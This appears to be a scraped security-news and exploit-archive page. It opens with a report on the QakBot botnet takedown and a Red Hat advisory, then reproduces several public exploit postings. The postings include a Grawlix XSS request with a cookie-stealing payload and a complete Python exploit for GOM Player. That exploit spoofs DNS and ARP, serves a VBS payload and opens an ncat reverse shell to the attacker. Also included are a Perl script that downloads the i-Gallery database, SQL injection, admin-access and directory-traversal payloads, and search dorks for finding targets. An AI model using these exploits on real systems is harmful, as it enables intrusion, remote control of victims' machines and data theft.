The U.S. government today announced a coordinated crackdown against QakBot, a complex malware family used by multiple cybercrime groups to lay the groundwork for ransomware infections. The international law enforcement operation involved seizing control over the botnet's online infrastructure, and quietly removing the Qakbot malware from tens of thousands of infected Microsoft Windows computer systems.

The U.S. government today announced a coordinated crackdown against **QakBot**, a complex malware family used by multiple cybercrime groups to lay the groundwork for ransomware infections. The international law enforcement operation involved seizing control over the botnet’s online infrastructure, and quietly removing the Qakbot malware from tens of thousands of infected Microsoft Windows computers.

Dutch authorities inside a data center with servers tied to the botnet. Image: Dutch National Police.

In an international operation announced today dubbed “**Duck Hunt**,” the **U.S. Department of Justice** (DOJ) and **Federal Bureau of Investigation** (FBI) said they obtained court orders to remove Qakbot from infected devices, and to seize servers used to control the botnet.

“This is the most significant technological and financial operation ever led by the Department of Justice against a botnet,” said **Martin Estrada**, the U.S. attorney for the Southern District of California, at a press conference this morning in Los Angeles.

Estrada said Qakbot has been implicated in 40 different ransomware attacks over the past 18 months, intrusions that collectively cost victims more than $58 million in losses.

Emerging in 2007 as a banking trojan, QakBot (a.k.a. **Qbot** and **Pinkslipbot**) has morphed into an advanced malware strain now used by multiple cybercriminal groups to prepare newly compromised networks for ransomware infestations. QakBot is most commonly delivered via email phishing lures disguised as something legitimate and time-sensitive, such as invoices or work orders.

**Don Alway**, assistant director in charge of the FBI’s Los Angeles field office, said federal investigators gained access to an online panel that allowed cybercrooks to monitor and control the actions of the botnet. From there, investigators obtained court-ordered approval to instruct all infected systems to uninstall Qakbot and to disconnect themselves from the botnet, Alway said.

The DOJ says their access to the botnet’s control panel revealed that Qakbot had been used to infect more than 700,000 machines in the past year alone, including 200,000 systems in the United States.

Working with law enforcement partners in France, Germany, Latvia, the Netherlands, Romania and the United Kingdom, the DOJ said it was able to seize more than 50 Internet servers tied to the malware network, and nearly $9 million in ill-gotten cryptocurrency from QakBot’s cybercriminal overlords. The DOJ declined to say whether any suspects were questioned or arrested in connection with Qakbot, citing an ongoing investigation.

According to recent figures from the managed security firm **Reliaquest**, QakBot is by far the most prevalent malware “loader” — malicious software used to secure access to a hacked network and help drop additional malware payloads. Reliaquest says QakBot infections accounted for nearly one-third of all loaders observed in the wild during the first six months of this year.

Qakbot/Qbot was once again the top malware loader observed in the wild in the first six months of 2023. Source: Reliaquest.com.

Researchers at **AT&T Alien Labs** say the crooks responsible for maintaining the QakBot botnet have rented their creation to various cybercrime groups over the years. More recently, however, QakBot has been closely associated with ransomware attacks from **Black Basta**, a prolific Russian-language criminal group that was thought to have spun off from the Conti ransomware gang in early 2022.

Today’s operation is not the first time the U.S. government has used court orders to remotely disinfect systems compromised with malware. In April 2022, the DOJ quietly removed malware from computers around the world infected by the “Snake” malware, an even older malware family that has been tied to the GRU, an intelligence arm of the Russian military.

Documents published by the DOJ in support of today’s takedown state that beginning on Aug. 25, 2023, law enforcement gained access to the Qakbot botnet, redirected botnet traffic to and through servers controlled by law enforcement, and instructed Qakbot-infected computers to download a Qakbot Uninstall file that uninstalled Qakbot malware from the infected computer.

“The Qakbot Uninstall file did not remediate other malware that was already installed on infected computers,” the government explained. “Instead, it was designed to prevent additional Qakbot malware from being installed on the infected computer by untethering the victim computer from the Qakbot botnet.”

The DOJ said it also recovered more than 6.5 million stolen passwords and other credentials, and that it has shared this information with two websites that let users check to see if their credentials were exposed: Have I Been Pwned, and a “Check Your Hack” website erected by the **Dutch National Police**.

Further reading:

–The DOJ’s application for a search warrant application tied to Qakbot uninstall file (PDF)  
–The search warrant application connected to QakBot server infrastructure in the United States (PDF)  
–The government’s application for a warrant to seize virtual currency from the QakBot operators (PDF)

U.S. Hacks QakBot, Quietly Removes Botnet Infections

Red Hat Security Advisory 2023-4835-01 - Red Hat OpenShift support for Windows Containers allows you to deploy Windows container workloads running on Windows Server containers. Issues addressed include a privilege escalation vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenShift support for Windows Containers 5.1.2 security update  
Advisory ID:       RHSA-2023:4835-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4835  
Issue date:        2023-08-29  
CVE Names:         CVE-2023-3676 CVE-2023-3955   
=====================================================================

1. Summary:

The components for Red Hat OpenShift support for Windows Containers 5.1.2  
are now available. This product release includes bug fixes and security  
updates for the following packages: windows-machine-config-operator and  
windows-machine-config-operator-bundle.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift support for Windows Containers allows you to deploy  
Windows container workloads running on Windows Server containers.

Security Fix(es):

* kubernetes: Insufficient input sanitization on Windows nodes leads to  
privilege escalation (CVE-2023-3676)

* kubernetes: Insufficient input sanitization on Windows nodes leads to  
privilege escalation (CVE-2023-3955)

For more details about the security issue(s), including the impact, CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For Windows Machine Config Operator upgrades, see the following  
documentation:  
https://docs.openshift.com/container-platform/latest/windows_containers/windows-node-upgrades.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2227126 - CVE-2023-3676 kubernetes: Insufficient input sanitization on Windows nodes leads to privilege escalation  
2227128 - CVE-2023-3955 kubernetes: Insufficient input sanitization on Windows nodes leads to privilege escalation

5. References:

https://access.redhat.com/security/cve/CVE-2023-3676  
https://access.redhat.com/security/cve/CVE-2023-3955  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk7gY6AAoJENzjgjWX9erEUaQP+wU4my4rzFBFp7Z5C2ofs3nn  
7TvEeLB3KI9qPqM4RgLVzybQBZPAlBVWiLtRJeqgwiRX1odZLbAtN1Gr42oL8eGw  
vqmCo1KKaO/oVFFZsZv7YuyThiWEZ0a1Rswg9Cai5bEeFOI7+8HlylEtwTiSUmWx  
22ysenpUOeQPMgOTaVE0XNDwuSEukrmNo391stLAfSyAx3p9wiX3tNO25y+VvNLj  
3CD0yHyWqC0lkyK2gXzsv4lt2BFoZNpXPvGji+NeO1HLs3Ni81B4CmRbxREPep3h  
/mfqSaTCnPOGz5DRb8a4f8SRvGlck7on1I7Strlf1infSZuDtnv4Bt9MzV1CfbMi  
T89euKSKr/vCqelRXBuSyRgjsgTlqvP5aFFVF4o/ngDOC5y5/rLjg6enUrQdD6BB  
u+T5/nBU4yzb84SD5RE9KCPWUbXmb5F7ksCXDyciwanN+G4GBKFiCrsE28kK9C78  
ZcP4z9ypfRFjBtVgHrMhnWhvXRu0S5bIs+1zXw027cmsN5X9dA2NV+ROMICPqJZm  
aQHJAWLoTd5Gxdqj0itUN7W/TfIO7kf4kvJezgkC8YRdaQWpmLNQ9xbEV6rTm72a  
LBoENzd38TIK8BKj+I1oTVmPpQk0y6yXjxDLTUSDGvp+z3ibhkBO9oFaLJDxG24y  
4SLyqK+bCiTx33pq0ayS  
=r8uD  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4835-01

Grawlix version 1.5.1 suffers from a cross site scripting vulnerability.

    ## Title: grawlix-1.5.1 XSS-Reflected## Author: nu11secur1ty## Date: 08/29/2023## Vendor: https://getgrawlix.com/## Software:## Reference: https://portswigger.net/web-security/cross-site-scripting## Description:The value of the ref request parameter is copied into the value of anHTML tag attribute which is encapsulated in double quotation marks.The payload vy7tu"><script>alert(1)</script>e284ovbptuv was submittedin the ref parameter. This input was echoed unmodified in theapplication's response. The attacker can steal PHPSESSID cookie andcan trick the victim into visiting his or some other dangerous URLaddress.STATUS: HIGH-Vulnerability[+]Exploit:```POSTGET /grawlix-1.5.1/grawlix-cms-1.5.1/_admin/panl.login.php?grlx_xss_token=&ref=book.view.phpvy7tu%22%3E%3Cscript%3Ealert(%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65)%3C%2fscript%3Ehttp://pornhub.com&username=UXBhcRhk&extra=y9R%21m8c%21W6&submit=LoginHTTP/1.1Host: localhostsec-ch-ua:sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=oq08tie8elf34amgmti9e8bel2Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/getgrawlix/getgrawlix-1.5.1)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/grawlix-cms-151-xss-reflected.html)## Time spend:00:27:00

Grawlix 1.5.1 Cross Site Scripting

Mozilla Firefox only stores up to 1024 HSTS entries. When the limit is reached, Firefox discards entries based on their age and recent visits to the domain in question.

    # VULNERABILITYMozilla Firefox only stores up to 1024 HSTS entries.When the limit is reached, Firefox discards entries based on their age and recent visits to the domain in question.# IMPACTThe HSTS header ensures that once a page has been visited, the browser will attempt to connect to it using HTTPS.The limit means that Firefox effectively does not store any further HSTS headers, as new ones permanently override each other.Sites without HSTS protection are vulnerable to machine-in-the-middle attacks, especially downgrade attacks such as SSL Stripping.# MORETo find out if you are affected, check the number of HSTS entries:* Linux: `wc -l ~/.mozilla/firefox/{profile}/SiteSecurityServiceState.txt`* Windows: `find /c /v " " ".\AppData\Roaming\Mozilla\Firefox\Profiles\{profile}\SiteSecurityServiceState.txt"`This behavior was first reported by Sheila Ayelen Berta and Sergio De Los Santos at Black Hat Europe 2017.I filed a bug report in February 2023 that is currently being worked on.# REFERENCES* Bug report: https://bugzilla.mozilla.org/show_bug.cgi?id=1818984* Mastodon thread: https://infosec.exchange/@kpwn/110010433703922665* Blog post: https://kpwn.de/2023/03/http-strict-transport-security/#1-the-limited-number-of-hsts-entries* Black Hat Europe 2017: Breaking Out HSTS (and HPKP) On Firefox, IE/Edge and (Possibly) Chrome   * Slides: https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf   * Talk: https://www.youtube.com/watch?v=dPnU9_pXJ5k

Mozilla Firefox HSTS Enty Limit

GOM Player version 2.3.90.5360 man-in-the-middle proof of concept remote code execution exploit.

    # Exploit Title: GOM Player 2.3.90.5360 - Remote Code Execution (RCE)# Date: 26.08.2023# Author: M. Akil Gündoğan# Contact: https://twitter.com/akilgundogan# Vendor Homepage: https://www.gomlab.com/gomplayer-media-player/# Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE# Version: 2.3.90.5360 # Tested on: Windows 10 Pro x64 22H2 19045.3324# PoC Video: https://www.youtube.com/watch?v=8d0YUpdPzp8# Impacts: GOM player has been downloaded 63,952,102 times according to CNET. It is used by millions of people worldwide.# Vulnerability Description: # The IE component in the GOM Player's interface uses an insecure HTTP connection. Since IE is vulnerable to the # SMB/WebDAV+ "search-ms" technique, we can redirect the victim to the page we created with DNS spoofing and execute code on the target.# In addition, the URL+ZIP+VBS MoTW bypass technique was used to prevent the victim from seeing any warning in the pop-up window. # Full disclosure, developers should be more careful about software security.# Exploit Usage: Run it and enter the IP address of the target. Then specify the port to listen to for the reverse shell.# Some spaghetti and a bad code but it works :)banner = """\033[38;5;196m+-----------------------------------------------------------+|     GOM Player 2.3.90.5360 - Remote Code Execution        ||   Test edildi, sinifta kaldi. Bu oyun hic bitmeyecek :-)  |+-----------------------------------------------------------+\033[0m""" +""" \033[38;5;117m[*]- Author: M. Akil Gundogan - rootkit.com.tr\n\033[0m"""import time,os,zipfile,subprocess,socket,sysprint(banner)if os.geteuid() != 0:    print("You need root privileges to run the exploit, please use sudo...")    sys.exit(1)targetIP = input("- Target IP address: ")listenPort = input("- Listening port for Reverse Shell: ")def fCreate(fileName,fileContent): # File create func.     f = open(fileName,"w")    f.write(fileContent)    f.close()    gw = os.popen("ip -4 route show default").read().split()s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)s.connect((gw[2], 0))ipaddr = s.getsockname()[0]gateway = gw[2]host = socket.gethostname()print ("- My IP:", ipaddr, " Gateway:", gateway, " Host:", host) print("\n[*]- Stage 1: Downloading neccesary tools...")smbFolderName = "GomUpdater" # change this (optional)expWorkDir = "gomExploitDir" # change this (optional)os.system("mkdir " + expWorkDir +" >/dev/null 2>&1 &") # Creating a working directory for the exploit.time.sleep(1) # It's necessary for exploit stability. os.system("cd " + expWorkDir + "&& mkdir smb-shared web-shared >/dev/null 2>&1 &") # Creating a working directory for the exploit.time.sleep(1) # It's necessary for exploit stability. os.system("cd " + expWorkDir + "/smb-shared && wget https://nmap.org/dist/ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && unzip -o -j ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && rm -rf ncat-portable-5.59BETA1.zip README") #Downloading ncatprint("    [*] - Ncat has been downloaded.")subprocess.run("git clone https://github.com/fortra/impacket.git " + expWorkDir + "/impacket >/dev/null 2>&1",shell=True) # Downloading Impacketprint("    [*] - Impacket has been downloaded.")subprocess.run("git clone https://github.com/dtrecherel/DNSSpoof.git " + expWorkDir + "/dnsspoof >/dev/null 2>&1",shell=True) # Downloading DNSSpoof.pyprint("    [*] - DNSSpoof.py has been downloaded.")print("[*]- Stage 2: Creating Attacker SMB Server...")subprocess.Popen("cd " + expWorkDir + /impacket/examples && python3 smbserver.py "+smbFolderName+" ../../smb-shared -smb2support >/dev/null 2>&1",shell=True) # Running SMB server.time.sleep(5) # It's necessary for exploit stability. smbIP = ipaddrspoofUrl = "playinfo.gomlab.com" # Web page that causes vulnerability because it is used as HTTPprint("[*]- Stage 3: Creating Attacker Web Page...")# change this (optional) screenExpPage = """<meta charset="utf-8"><script> window.alert("GOM Player için acil güncelleme yapılmalı ! Açılan pencerede lütfen updater'a tıklayın.");</script> <script>window.location.href= 'search-ms:displayname=GOM Player Updater&crumb=System.Generic.String%3AUpdater&crumb=location:%5C%5C"""+smbIP+"""';</script>"""fCreate(expWorkDir + "/web-shared/screen.html",screenExpPage)time.sleep(3) # It's necessary for exploit stability. print("[*]- Stage 4: Creating URL+VBS for MoTW bypass placing it into the ZIP archive...")vbsCommand = '''Set shell=CreateObject("wscript.shell") Shell.Run("xcopy /y \\\\yogurt\\ayran\\ncat.exe %temp%")WScript.Sleep 5000Shell.Run("cmd /c start /min cmd /c %temp%\\ncat.exe attackerIP attackerPort -e cmd")''' # change this (optional)vbsCommand = vbsCommand.replace("yogurt", smbIP).replace("ayran", smbFolderName).replace("attackerIP",smbIP).replace("attackerPort",listenPort)fCreate(expWorkDir + "/payload.vbs",vbsCommand)urlShortcut = '''[InternetShortcut]URL=file://'''+smbIP+"/"+smbFolderName+'''/archive.zip/payload.vbsIDlist='''fCreate(expWorkDir + "/smb-shared/Updater.url",urlShortcut)time.sleep(3) # It's necessary for exploit stability. zipName = expWorkDir + "/smb-shared/archive.zip"payload_filename = os.path.join(expWorkDir, "payload.vbs")  with zipfile.ZipFile(zipName, "w") as malzip:    malzip.write(payload_filename, arcname=os.path.basename(payload_filename))print("[*]- Stage 5: Running the attacker's web server...")subprocess.Popen("cd " + expWorkDir + "/web-shared && python3 -m http.server 80 >/dev/null 2>&1",shell=True) # Running attacker web server with Python mini http.servertime.sleep(3) # It's necessary for exploit stability. print("[*]- Stage 6: Performing DNS and ARP spoofing for the target...")subprocess.Popen("python3 " + expWorkDir + "/dnsspoof/dnsspoof.py -d " + spoofUrl + " -t " + targetIP + ">/dev/null 2>&1",shell=True) # DNS Spoofing...time.sleep(10) # It's neccesary for exploit stability.os.system("ping -c 5 " + targetIP + " >/dev/null 2>&1 &") # Ping the target... os.system("arping -c 5 " + targetIP + " >/dev/null 2>&1 &") # ARPing the target.print("[*]- Stage 7: Waiting for the target to open GOM Player and execute the malicious URL shortcut...\n")subprocess.run("nc -lvnp " + listenPort,shell=True)subprocess.run("pkill -f smbserver.py & pkill -f http.server & pkill -f dnsspoof.py",shell=True) # Closing background processes after exploitation...

GOM Player 2.3.90.5360 MITM / Remote Code Execution

ImgHosting version 1.2 suffers from a cross site scripting vulnerability.

**ImgHosting 1.2 Cross Site Scripting**

Posted Aug 29, 2023

Authored by indoushka

ImgHosting version 1.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 3e0de4ff80dc516a1abe50185e5807a1e503d782b2cd24457e01031368191dc0

Download | Favorite | View

**ImgHosting 1.2 Cross Site Scripting**

    ====================================================================================================================================| # Title     : ImgHosting v1.2 XSS Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://codecanyon.net/user/FoxSash/?ref=FoxSash                                                                   |  | # Dork      : "ImgHosting  Programming by FoxSash"                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : ?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://127.0.0.1/pikhostinom/?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,046)
*   Arbitrary (16,219)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,283)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,348)
*   DoS (23,460)
*   Encryption (2,370)
*   Exploit (52,001)
*   File Inclusion (4,225)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,788)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,694)
*   Local (14,460)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,149)
*   Proof of Concept (2,339)
*   Protocol (3,603)
*   Python (1,535)
*   Remote (30,816)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,891)
*   Shell (3,187)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,207)
*   SQL Injection (16,394)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,796)
*   Web (9,671)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,973)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,822)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,543)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,777)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,844)
*   UNIX (9,301)
*   UnixWare (186)
*   Windows (6,579)
*   Other

ImgHosting 1.2 Cross Site Scripting

imax CMS version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : imax CMS v1.0 Sql Injection Vulnerability                                                                          || # Author    : indoushka                                                                                                          | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://i-maxinfotech.com                                                                                           |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] http://127.0.0.1/cafesaffronnetau/view_page.php?id={{x.id}} <=====| inject here[+]  Panel :http://127.0.0.1/cafesaffronnetau/wp-admin/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

imax CMS 1.0 SQL Injection

i-Gallery version 3.4 suffers from a database disclosure vulnerability.

====================================================================================================================================  
| # Title     : i-Gallery v3.4 Database Disclosure Exploit                                                                         |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |   
| # Vendor    : http://wmscripti.com/asp-scriptler/igallery-image-resim-galerisi-scripti.html                                      |    
====================================================================================================================================

poc :

[-] Download the database: 

    The following Perl exploit will attempt to download the (igallery.mdb ) file  
    The (igallery.mdb) It is the database and contains all the data .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
#  
# i-Gallery v3.4 Database Disclosure Exploit   
#  
# Author : indoushka  
#  
# Vondor : ToastForums.com

   use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print ('i-Gallery v3.4 Database Disclosure Exploit');  
system('color a');

if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File="database/igallery.mdb";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/igallery.mdb");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/igallery.mdb\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
=======================================================================================================================================

i-Gallery 3.4 Database Disclosure

iBilling CRM version 4.5.0 suffers from add administrator and insecure direct object reference vulnerabilities.

    ====================================================================================================================================| # Title     : iBilling CRM v4.5.0 Add Admin vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/ibilling-crm-accounting-and-billing-software/11021678                                  || # Dork      : "Login - iBilling"                                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] suffers from an insecure direct object reference that allows users to access the administrative interface.[+] choose a target and add "sysfrm/install/profile.php"[+] http://127.0.0.1/wintechsolutionsin/ibilling/sysfrm/install/profile.php[+] http://127.0.0.1/demotryibcom/dashboard/sysfrm/install/profile.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

iBilling CRM 4.5.0 Add Administrator / Insecure Direct Object Reference

Humhub version 1.3.13 suffers from a directory traversal vulnerability.

    ====================================================================================================================================| # Title     : Humhub v1.3.13 Directory traversal Vulnerability                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 67.0(32-bit)                                               | | # Vendor    : https://www.humhub.org/en/download/package/humhub-1.3.13.zip                                                       |  | # Dork      : "Propulsé par HumHub"                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /static/assets/d1081741/fonts/../Gemfile[+] https://127.0.0.1/humhubcom/static/assets/d1081741/fonts/../GemfileGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Tag

#windows